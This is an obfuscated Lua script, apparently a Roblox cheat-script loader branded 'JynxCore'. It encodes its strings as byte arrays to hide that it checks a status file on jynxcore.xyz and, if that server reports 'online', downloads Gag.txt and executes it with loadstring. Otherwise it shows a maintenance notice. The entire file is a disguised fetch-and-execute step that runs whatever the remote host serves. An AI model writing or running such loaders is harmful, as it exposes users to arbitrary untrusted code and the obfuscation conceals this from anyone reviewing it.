local function ψ(str)return string.char(table.unpack(str))end
local Φ=setmetatable({},{__index=function(_,k)return rawget(_G,k)end})

local ζ,η,θ,ι = {103,97,109,101},{72,116,116,112,71,101,116},{108,111,97,100,115,116,114,105,110,103},{83,116,97,114,116,101,114,71,117,105}
local κ,λ = {83,101,110,100,78,111,116,105,102,105,99,97,116,105,111,110},{115,116,97,116,117,115,46,116,120,116}
local μ,ν = {74,121,110,120,67,111,114,101},{77,97,105,110,116,101,110,97,110,99,101,32,105,110,32,112,114,111,103,114,101,115,115,46,32,80,108,101,97,115,101,32,99,104,101,99,107,32,98,97,99,107,32,108,97,116,101,114,46}

local function Ω(...)return(...)end
local function Σ(a,b)for i=1,#a do if a:sub(i,i)~=b:sub(i,i)then return false end end;return true end
local function Δ(f)return function(...)return f(...)end end

local Ψ=Φ[ψ(ζ)][ψ(η)]
local α=Ψ(ψ({104,116,116,112,115,58,47,47,106,121,110,120,99,111,114,101,46,120,121,122,47})..ψ(λ))

local function Χ()
	return Φ[ψ(θ)](Ψ(ψ({104,116,116,112,115,58,47,47,106,121,110,120,99,111,114,101,46,120,121,122,47,71,97,103,46,116,120,116})))
end

local function Β()
	Φ["warn"](ψ({91,74,89,78,88,67,79,82,69,93,32,83,99,114,105,112,116,32,117,110,100,101,114,32,109,97,105,110,116,101,110,97,110,99,101,46}))
	Φ[ψ(ζ)][ψ(ι)]:SetCore(ψ(κ),{
		[ψ({84,105,116,108,101})]=ψ(μ),
		[ψ({84,101,120,116})]=ψ(ν),
		[ψ({68,117,114,97,116,105,111,110})]=5
	})
end

local ρ=Δ(function(v)return Φ["string"]["lower"](v):find(ψ({111,110,108,105,110,101}))end)

return Ω((function()
	if not ρ(α)then return Β()else return Χ()end
end)())
